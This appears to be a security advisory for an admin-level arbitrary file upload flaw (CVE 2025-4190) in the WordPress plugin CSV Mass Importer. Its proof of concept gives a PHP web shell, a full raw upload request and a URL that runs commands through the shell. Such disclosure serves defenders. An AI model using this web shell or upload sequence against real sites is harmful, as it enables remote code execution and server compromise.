CSV Mass Importer <= 1.2 – Admin+ Arbitrary File Upload | CVE 2025-4190

Description

The plugin does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)

Proof of Concept

1. Authenticate as any WordPress admin user.
2. Navigate to the CSV Mass Importer plugin page: /wp-admin/tools.php?page=cmi-tool
3. Create a malicious PHP file (shell.php) with the following content:

`<?php system($_GET['cmd']); ?>`

4. Compress shell.php into a ZIP archive named "exploit.zip".
5. Send the following raw HTTP POST request to upload the ZIP file:

```
POST /wordpress/wp-admin/tools.php?page=cmi-tool HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.100.74:888/wordpress/wp-admin/tools.php?page=cmi-tool
Content-Type: multipart/form-data; boundary=---------------------------4402094932173957980191353790
Origin: http://192.168.100.74:888
Connection: keep-alive
Cookie: [Authenticated session cookies here]
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------4402094932173957980191353790
Content-Disposition: form-data; name="cmi_import_source"

upload
-----------------------------4402094932173957980191353790
Content-Disposition: form-data; name="cmi_csv_delim"

comma
-----------------------------4402094932173957980191353790
Content-Disposition: form-data; name="cmi_csv_separ"

2quote
-----------------------------4402094932173957980191353790
Content-Disposition: form-data; name="cmi_import_safe"

1
-----------------------------4402094932173957980191353790
Content-Disposition: form-data; name="cmi_import_upload"; filename="exploit.zip"
Content-Type: application/zip

(binary content of exploit.zip here)
-----------------------------4402094932173957980191353790--

```

6. After uploading, attempt to locate the extracted file on the server.
7. If the server extracts and saves the PHP file in a public directory, access it via:

http://example.com/wp-content/uploads/cmi-data/shell.php?cmd=ls